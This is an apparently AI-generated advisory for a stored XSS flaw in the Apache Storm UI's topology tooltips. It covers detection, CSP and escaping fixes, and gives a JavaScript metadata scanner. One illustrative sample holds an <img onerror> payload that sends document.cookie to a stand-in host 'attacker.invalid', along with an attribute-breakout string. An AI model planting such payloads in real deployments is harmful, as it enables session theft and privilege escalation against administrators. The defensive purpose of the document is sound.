CVE-2026-35565 Overview
A stored Cross-Site Scripting (XSS) vulnerability has been identified in the topology visualization component of the Apache Storm UI. The visualization code interpolates topology metadata (component IDs, stream names and grouping values) directly into tooltip HTML that is assigned via innerHTML in the parseNode() and parseEdge() functions, and no layer of the pipeline (topology submission, Nimbus, the UI REST layer or the browser code) HTML-encodes those values. An authenticated user with topology submission rights can therefore plant HTML and JavaScript in the UI by choosing crafted component identifiers.
Critical Impact
In multi-tenant Apache Storm deployments where topology submission is available to less-trusted users but the UI is used by operators or administrators, this vulnerability enables privilege escalation: the injected script runs in the administrator's browser session, with that session's access to the Storm UI. Anything the administrator can do from the UI is then available to the attacker's script, for example issuing topology management actions or reading cluster configuration exposed by the UI, and the session can be used to exfiltrate whatever credentials or tokens the browser holds for it.
Affected Products
- Apache Storm versions before 2.8.6
- Apache Storm UI visualization component
- Multi-tenant Apache Storm deployments with shared UI access
Discovery Timeline
- 2026-04-12 - Apache releases Storm 2.8.6 security patch
- 2026-04-13 - CVE-2026-35565 published to NVD
- 2026-04-15 - Last updated in NVD database
Technical Details for CVE-2026-35565
Vulnerability Analysis
This stored XSS vulnerability exists due to improper output encoding in the Apache Storm UI's topology visualization feature. The visualization component processes topology metadata received from the Nimbus service via Thrift and renders it in the browser using the vis.js library for tooltip display. The fundamental issue is that user-controlled topology metadata flows through the system without sanitization and is ultimately rendered using innerHTML, which interprets the content as HTML rather than treating it as plain text.
The attack requires an authenticated user with topology submission permissions, so the attacker needs valid credentials and authorization to submit topologies to the Storm cluster. The payload, however, executes in the browser sessions of other users when they open the affected topology's visualization in the Storm UI, which is especially dangerous when administrators use the same interface.
Root Cause
The root cause is improper neutralization of input during web page generation (CWE-79). The parseNode() and parseEdge() JavaScript functions in the Storm UI visualization code use innerHTML to render tooltip content containing API-supplied values. These values—including nodeId, :capacity, :latency, :component, :stream, and :grouping—are passed directly from the backend without HTML encoding, allowing injection of arbitrary HTML elements and JavaScript event handlers.
Attack Vector
The attack chain begins when a malicious user with topology submission rights crafts a Storm topology containing JavaScript payloads embedded in component identifiers. For example, an attacker could create a bolt with an ID containing an onerror event handler or similar HTML injection payload.
The payload propagates through the following path: the malicious topology is submitted to Nimbus, which stores the topology metadata. When any user accesses the Storm UI and views the topology visualization, the Visualization API retrieves the metadata via Thrift. The vis.js tooltip rendering then processes this data through parseNode() or parseEdge(), which interpolates the malicious component ID directly into HTML using innerHTML. This causes the injected JavaScript to execute in the victim's browser context.
Since the payload is stored server-side and executed whenever the topology is viewed, this constitutes a stored XSS vulnerability. The attack is particularly effective against administrators who routinely monitor cluster topologies through the Storm UI.
Detection Methods for CVE-2026-35565
Indicators of Compromise
- Topology component IDs, stream names, or grouping values containing HTML tags such as <script>, <img>, or <svg>. Note that a <script> element inserted via innerHTML is not executed by browsers, whereas event handlers on elements such as <img> or <svg> are; a <script> tag in an ID is still a clear sign of tampering even though it is not the working payload
- Presence of JavaScript event handlers (e.g., onerror, onload, onclick, onmouseover) or javascript: URIs in topology metadata fields
- Unexpected outbound connections from administrator workstations following Storm UI access
- Session tokens or credentials being exfiltrated to external domains
Detection Strategies
- Do not rely on a Web Application Firewall for this: topologies are submitted to Nimbus over Thrift, not over HTTP, so a WAF in front of the Storm UI never sees the submission. Inspection has to happen on the stored metadata instead
- Nimbus submission log lines typically record the topology name and submitter rather than individual component IDs, so use them to attribute a suspicious topology to a user, not as the primary detection source
- Deploy browser-based XSS detection extensions on administrator workstations accessing the Storm UI as a secondary control; they are not a substitute for scanning the stored metadata
- Periodically enumerate topologies through the Storm UI REST API and scan every component ID, stream name and grouping value for injection patterns; this is the most direct detection for a stored payload
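The following is an added example, not part of the advisory and not Apache Storm's own code. It shows the periodic scan described above run over a constructed object loosely modelled on the per-topology visualization data the Storm UI serves (the node keys, and the `:inputs`, `:component`, `:stream` and `:grouping` fields named in the advisory); the exact field layout, the REST endpoint you pull it from and the topology ID are assumptions, so adapt the walker to the JSON your own cluster returns.

```javascript
// Added example: scan Storm topology metadata for stored-XSS indicators.
// Not Apache Storm code. The input shape is an assumption modelled on the
// field names the advisory lists; verify it against your UI's REST output.

// Patterns that should never appear in a component ID, stream or grouping.
// The entity pattern can false-positive on legitimate "&name;" strings;
// treat it as a low-confidence hit.
const SUSPICIOUS = [
  { name: 'html-tag',       re: /<\s*\/?\s*[a-z][^>]*>/i },
  { name: 'event-handler',  re: /\bon[a-z]+\s*=/i },
  { name: 'javascript-uri', re: /javascript\s*:/i },
  { name: 'html-entity',    re: /&(#x?[0-9a-f]+|[a-z]+);/i },
];

// Returns the names of every pattern that matches the value.
function classify(value) {
  const s = String(value);
  return SUSPICIOUS.filter(({ re }) => re.test(s)).map(({ name }) => name);
}

// Walks every node ID and each input edge's component, stream and grouping,
// returning one finding per suspicious field with a path for triage.
function scanTopology(topologyId, viz) {
  const findings = [];
  const check = (path, value) => {
    const hits = classify(value);
    if (hits.length) findings.push({ topologyId, path, value: String(value), hits });
  };
  for (const [nodeId, node] of Object.entries(viz)) {
    check(nodeId, nodeId);
    for (const [i, input] of (node[':inputs'] || []).entries()) {
      check(`${nodeId}.:inputs[${i}].:component`, input[':component']);
      check(`${nodeId}.:inputs[${i}].:stream`, input[':stream']);
      check(`${nodeId}.:inputs[${i}].:grouping`, input[':grouping']);
    }
  }
  return findings;
}

// Constructed sample: two clean components and one bolt carrying payloads in
// both its ID and one of its input stream names.
const sampleViz = {
  'spout1': { ':inputs': [] },
  'count': {
    ':inputs': [{ ':component': 'spout1', ':stream': 'default', ':grouping': 'fields' }],
  },
  'bolt<svg onload=alert(1)>': {
    ':inputs': [{ ':component': 'count', ':stream': 'x" onmouseover="alert(2)', ':grouping': 'shuffle' }],
  },
};

// Hypothetical topology ID; in practice iterate the IDs from the summary endpoint.
function sampleFindings() {
  return scanTopology('wordcount-1-1712900000', sampleViz);
}

// Running stand-alone prints the findings for the constructed sample.
console.log(JSON.stringify(sampleFindings(), null, 2));
```

Run it on a schedule against every topology ID the UI lists and alert on any non-empty result; a clean cluster should produce zero findings, so the scan needs no baseline.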
Monitoring Recommendations
- Enable verbose logging for topology submission events on the Nimbus server
- Configure Content Security Policy (CSP) headers on the Storm UI (for example at a reverse proxy in front of it) to restrict inline script execution. A policy without 'unsafe-inline' neutralizes inline event-handler payloads, but it can also break the UI's own inline scripts, so test it against a staging UI before enforcing it in production
- Set up alerts for topology submissions from unusual IP addresses or at unusual times
- Monitor for authentication anomalies following Storm UI access that could indicate session compromise
How to Mitigate CVE-2026-35565
Immediate Actions Required
- Upgrade Apache Storm to version 2.8.6 or later immediately
- Restrict topology submission rights to trusted users only as a defense-in-depth measure, by enabling a Nimbus authorizer (for example SimpleACLAuthorizer) and limiting the users allowed to submit
- Audit existing topologies for any suspicious component IDs, stream names, or grouping values
- Review access logs for the Storm UI to identify potential exploitation attempts
Patch Information
Apache has released Storm version 2.8.6 which addresses this vulnerability. Users running Apache Storm 2.x should upgrade to this version immediately. The fix includes proper HTML encoding of all API-supplied values before they are interpolated into tooltip HTML strings. Detailed information about the security fix is available in the Apache Storm 2.8.6 Release Announcement.
Workarounds
- Manually patch the parseNode() and parseEdge() functions in the visualization JavaScript file so that every API-supplied value (nodeId, :capacity, :latency, :component, :stream, and :grouping) is HTML-escaped before it is interpolated into the tooltip string; escaping must cover &, <, >, " and ' so that values placed inside attributes cannot break out of them
- Restrict topology submission to trusted users only via Nimbus ACLs
- Implement Content Security Policy headers to mitigate JavaScript execution from injected content
- Consider temporarily disabling the topology visualization feature if immediate patching is not feasible
A detailed guide on implementing the monkey-patch workaround is available in the release notes of version 2.8.6. Organizations unable to upgrade immediately should prioritize restricting topology submission rights to minimize the attack surface.
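The following is an added example, not part of the advisory and not the Storm UI's actual source. It models the attack path from the Attack Vector section and the escaping workaround above side by side: a vulnerable tooltip builder that interpolates API-supplied values into markup destined for innerHTML, and a hardened version that HTML-escapes each value first. The function bodies, the sample node and edge, and the attacker host `attacker.invalid` are constructed for illustration; only the field names (`nodeId`, `:capacity`, `:latency`, `:component`, `:stream`, `:grouping`) come from the advisory. It runs without a browser because it only builds the HTML strings.

```javascript
// Added example: vulnerable vs. hardened tooltip construction.
// Not Apache Storm code. The templates below are an assumption about how a
// tooltip string might be built; the escaping is the point.

// Constructed sample metadata. The bolt ID carries the payload: an <img>
// whose onerror handler fires as soon as innerHTML inserts the element.
const maliciousNode = {
  nodeId: 'bolt<img src=x onerror="fetch(\'//attacker.invalid/?c=\'+document.cookie)">',
  ':capacity': 0.42,
  ':latency': 3.7,
};

// Constructed edge whose stream name breaks out of a quoted attribute.
const maliciousEdge = {
  ':component': 'spout1',
  ':stream': 'default" onmouseover="alert(1)',
  ':grouping': 'shuffle',
};

// Vulnerable pattern: raw values dropped into markup later assigned to
// innerHTML, so attacker-controlled tags and attributes become live DOM.
function parseNodeVulnerable(n) {
  return '<b>' + n.nodeId + '</b><br>' +
         'Capacity: ' + n[':capacity'] + '<br>' +
         'Latency: ' + n[':latency'] + ' ms';
}

function parseEdgeVulnerable(e) {
  return '<span title="' + e[':stream'] + '">' + e[':component'] + '</span>' +
         ' (' + e[':grouping'] + ')';
}

// Hardened pattern: escape every API-supplied value before interpolation.
// Escaping &, <, >, " and ' covers both text and quoted-attribute contexts.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[ch]);
}

function parseNodeSafe(n) {
  return '<b>' + escapeHtml(n.nodeId) + '</b><br>' +
         'Capacity: ' + escapeHtml(n[':capacity']) + '<br>' +
         'Latency: ' + escapeHtml(n[':latency']) + ' ms';
}

function parseEdgeSafe(e) {
  return '<span title="' + escapeHtml(e[':stream']) + '">' +
         escapeHtml(e[':component']) + '</span>' +
         ' (' + escapeHtml(e[':grouping']) + ')';
}

// Reviewer's check: did an attacker-supplied tag or a live, quote-delimited
// event handler survive into the output? Escaped output turns '<img' into
// '&lt;img' and 'onerror="' into 'onerror=&quot;', so neither matches.
function looksInjected(html) {
  return /<img|\bon[a-z]+="/i.test(html);
}

// Running stand-alone prints all four renderings for comparison.
for (const [label, html] of [
  ['node (vulnerable)', parseNodeVulnerable(maliciousNode)],
  ['node (hardened)',   parseNodeSafe(maliciousNode)],
  ['edge (vulnerable)', parseEdgeVulnerable(maliciousEdge)],
  ['edge (hardened)',   parseEdgeSafe(maliciousEdge)],
]) {
  console.log(label + ': ' + html + '  injected=' + looksInjected(html));
}
```

When applying the workaround to the real visualization file, apply escapeHtml (or an equivalent) at every interpolation point, including numeric fields such as :capacity and :latency; values that are numeric today are still strings arriving from the API, and escaping them costs nothing.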
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

